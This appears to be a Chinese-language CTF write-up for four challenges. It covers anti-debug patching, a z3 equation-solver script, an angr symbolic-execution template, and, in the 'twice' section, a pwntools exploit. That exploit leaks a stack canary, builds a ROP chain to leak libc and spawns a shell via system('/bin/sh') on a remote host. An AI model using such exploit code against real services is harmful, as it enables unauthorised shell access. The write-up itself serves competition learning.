Nop
首先进去后有两个地方的反调试我们nop掉
这两个位置nop掉,后进行分析
这是整理好的文件,大概看到了eax的三次++,以及一次
也就是eax + 0xCCCCCCCF
主要问题在这里,进行了两次的nop地址,所以说下面的那个jmp只需要到right,反推-0xCCCCCCCF
0x108048765-0xCCCCCCCF= 93,507,990
ManageCode
我们对应的RVA,这里学到了OD调试C#的一个东西,mscoree._CorExeMain是C#导入表只有这个函数,其他都是框架处理了
z3解方程即可,这里也学到了z3解方程的知识
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
| from z3 import *
s = Solver()
flag = [Int(('x%d' % i)) for i in range(32)]
v1 = 1
v2 = a1[0]
v33 = a1[0]
v3 = a1[2]
v31 = a1[2]
s.add (-307337 * v2 == -29811689)
v4 = a1[1]
v32 = a1[1]
s.add (31219 * v2 - 470462 * v4 == -7321921)
v5 = 282799 * v4
v6 = a1[3]
v30 = a1[3]
s.add (v5 + 145509 * v3 - 299180 * v33 == 13723877)
v7 = v1
s.add (475769 * v6 - 175678 * v32 - 389730 * v3 - 482630 * v33 == -95216128)
v29 = a1[4]
s.add (-491556 * v33 - 36988 * v29 + 107882 * v32 + -208516 * v6 - 340530 * v3 == -159608574)
v8 = a1[5]
v27 = v8
s.add (115318 * v8 + 467004 * v33 + 110069 * v29 + 82828 * v31 - 14270 * v32 - 303753 * v6 == 59922906)
v9 = a1[6]
v28 = v9
s.add (-279354 * v8 - 301605 * v30 + 336041 * v33 + 45022 * v31 + 111726 * v32 - 146340 * v29 - 237939 * v9 == -82351664)
v10 = a1[7]
v26 = v10
s.add (-147932 * v29
- 23111 * v27
+ 356418 * v30
+ 157129 * v9
+ 96850 * v31
+ 459807 * v10
+ -239175 * v33
- 15611 * v32 == 54529836)
v11 = a1[8]
v25 = v11
s.add (-288572 * v10
- 452860 * v11
- 281026 * v31
+ 459847 * v29
+ 105871 * v32
+ 363927 * v28
+ 107668 * v33
+ 305746 * v27
+ 474305 * v30 == 94077867)
v12 = a1[9]
v24 = a1[9]
v13 = v7
s.add (24450 * v32
+ 318367 * v27
+ 131436 * v33
+ 163730 * v31
+ 68350 * v30
+ -200364 * v12
- 367700 * v26
- 298737 * v11
- 26977 * v28
- 411916 * v29 == -20388052)
v14 = v13
v15 = a1[10]
v23 = v15
s.add (23830 * v31
+ 389775 * v26
+ 301398 * v32
+ 367177 * v27
+ 311452 * v30
- 434957 * v12
- 136393 * v15
- 172925 * v25
- 146025 * v33
- 493051 * v28
- 130882 * v29 == -88920064)
v16 = a1[11]
v22 = v16
s.add (-427662 * v33
- 98903 * v29
- 17320 * v15
- 218483 * v32
- 85741 * v30
+ 363857 * v26
+ 163521 * v16
+ 304649 * v27
+ -43728 * v25
- 181088 * v31
+ 173715 * v24
+ 14457 * v28 == -61620324)
v17 = a1[12]
v21 = v17
s.add (-195542 * v27
- 498833 * v32
- 412336 * v24
- 216657 * v29
- 501433 * v16
+ 271173 * v31
+ 74652 * v30
+ 373303 * v28
- 306925 * v25
- 338825 * v26
- 475559 * v33
- 358450 * v17
- (v23 << 15) == -174934821)
v18 = a1[13]
s.add (110210 * v22
+ -351890 * v31
- 184149 * v24
- 437072 * v17
+ 324022 * v28
+ 357830 * v25
+ 162554 * v26
+ 369921 * v32
+ 142164 * v29
+ 136219 * v23
+ 49387 * v33
- 323429 * v18
- 198716 * v30
- 411630 * v27 != -124829042)
v19 = a1[14]
s.add (473866 * v23
+ -257967 * v32
- 222834 * v26
- 118361 * v25
+ 426304 * v33
+ 507378 * v19
+ 362998 * v21
- 342754 * v27
- 266674 * v24
- 61369 * v18
- 267106 * v29
- 388543 * v22
- 97045 * v28
- 229602 * v31
- 84816 * v30 == 78977681)
s.add (402402 * v23
+ 477363 * v29
+ 447356 * v27
+ 46659 * v22
+ -89442 * v25
- 455802 * v28
- 290697 * v33
- 108648 * v18
+ 279039 * v19
+ 520878 * v24
+ 335538 * v32
+ 310844 * v31
+ 110817 * v26
- 433259 * a1[15]
- 525875 * v21
- 2295 * v30 == 80694627)
if s.check()==sat:
print "sat"
print s.model()
else:
print "un"
|
rev
直接看到是个虚拟机,判断条件不是很多直接angr,一梭子网上找的模板,也是之前科二师傅给我的模板
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| import angr
import sys
import claripy
def main(argv):
bin_path = argv[1]
p = angr.Project(bin_path)
argv1 = claripy.BVS("argv1", 100 * 8)
init_state = p.factory.entry_state(args = [bin_path,argv1])
sim = p.factory.simulation_manager(init_state)
def is_good(state):
return b'right' in state.posix.dumps(1)
def is_bad(state):
return b'wrong' in state.posix.dumps(1)
sim.explore(find = is_good ,avoid = is_bad)
if sim.found:
found_state = sim.found[0]
print("Flag: {}".format(found_state.posix.dumps(0)))
print()
solution = found_state.solver.eval(argv1, cast_to=bytes)
print(bytes.decode(solution).strip('\x00')) # 先解码转换成str,再去掉\x00
else :
print("cannot found a solution")
if __name__ == "__main__":
main(sys.argv)
|
twice
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64" #"i386"
exe = './pwn'
elf = ELF(exe)
# p = process(exe)
#p = process(['exe'],env={"LD_PRELOAD":"libc"})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = remote('121.36.59.116',9999)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#------------------------------------
def d(s = ''):
gdb.attach(p,s)
def pwn():
# d("b *0x400844")
payload = '\x11'*0x59
p.send(payload)
p.recvuntil("\x11"*0x58)
cananry = u64(p.recv(8)) - 0x11
stack_addr = u64(p.recv(6).ljust(8,'\x00'))- 0x70
payload = p64(0x0000000000400923)+p64(elf.got['puts'])+p64(elf.plt['puts'])
payload += p64(0x00000000040087B)+p64(0)*6
payload += p64(stack_addr)+p64(cananry) + p64(stack_addr-8)
payload += p64(0x0000000000400879)
# payload1 += p64(stack_addr)
p.send(payload)
p.recvline()
p.recvline()
libc.address = u64(p.recv(6).ljust(8,'\x00')) - 0x6f690
payload2 = p64(0x0000000000400923) + p64(libc.search("/bin/sh\x00").next()) + p64(libc.sym['system'])
payload2 += p64(0)*8 + p64(cananry) + p64(stack_addr-0x60) + p64(0x0000000000400879)
p.sendline("\x11"*0x10)
p.sendline(payload2)
p.interactive()
#-------------------------------------
pwn()
|
